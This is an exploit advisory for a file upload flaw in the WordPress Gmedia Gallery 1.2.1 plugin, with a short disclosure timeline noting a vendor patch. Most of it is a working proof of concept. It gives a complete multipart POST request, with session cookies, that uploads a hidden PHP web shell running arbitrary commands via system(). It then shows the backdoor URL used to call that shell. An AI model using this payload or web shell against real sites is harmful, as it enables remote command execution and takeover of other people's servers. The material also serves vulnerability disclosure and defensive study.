######################
# Exploit Title : Wordpress Gmedia Gallery 1.2.1 Shell Upload Vulnerability
# Exploit Author : Claudio Viviani
# Vendor Homepage : http://www.codeasily.com/
# Software Link : http://downloads.wordpress.org/plugin/grand-media.zip
# Date : 2014-08-01
# Tested on : Windows 7 / Mozilla Firefox
######################
# Description :
Any user could upload php files (administrator by default).
######################
# Vulnerability Disclosure Timeline:
2014-08-01: Discovered vulnerability
2014-08-01: Vendor Notification (Twitter)
2014-08-01: Vendor Response/Feedback
2014-08-02: Vendor Fix/Patch
2014-08-02: Public Disclosure
######################
# PoC:
POST
Host=127.0.0.1
User-Agent=Mozilla/5.0 (Windows NT 6.1; WOW64; rv:31.0) Gecko/20100101 Firefox/31.0
Accept=text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language=it-IT,it;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding=gzip, deflate
Referer=http://127.0.0.1/wordpress/wp-admin/admin.php?page=GrandMedia_AddMedia
Content-Length=916
Content-Type=multipart/form-data; boundary=---------------------------304431219031197
Cookie=wordpress_75aacd302e2a4723897cb1d154c13f77=pippo%7C1407087221%7Ce7319f78d3d8ab969d8896d72dc8c2da; wordpress_test_cookie=WP+Cookie+check; wordpress_logged_in_75aacd302e2a4723897cb1d154c13f77=pippo%7C1407087221%7C7d38cc7811b5a07ab22e799069eed6e7; wp-settings-time-1=1406915840
Connection=keep-alive
Pragma=no-cache
Cache-Control=no-cache
POSTDATA =-----------------------------304431219031197
Content-Disposition: form-data; name="name"
.shell.php
-----------------------------304431219031197
Content-Disposition: form-data; name="chunk"
0
-----------------------------304431219031197
Content-Disposition: form-data; name="chunks"
1
-----------------------------304431219031197
Content-Disposition: form-data; name="params"
terms%5Bgmedia_category%5D=&terms%5Bgmedia_album%5D=&terms%5Bgmedia_tag%5D=
-----------------------------304431219031197
Content-Disposition: form-data; name="file"; filename=".shell.php"
Content-Type: application/octet-stream
<?php
if(isset($_REQUEST['cmd'])){
echo "<pre>";
$cmd = ($_REQUEST['cmd']);
system($cmd);
echo "</pre>";
die;
}
?>
-----------------------------304431219031197--
Backdoor location:
http://127.0.0.1/wordpress/wp-content/grand-media/application/.shell.php?cmd=pwd
#####################
Discovered By : Claudio Viviani
http://www.homelab.it
info@homelab.it
homelabit@protonmail.ch
https://www.facebook.com/homelabit
https://twitter.com/homelabit
https://plus.google.com/+HomelabIt1/
#####################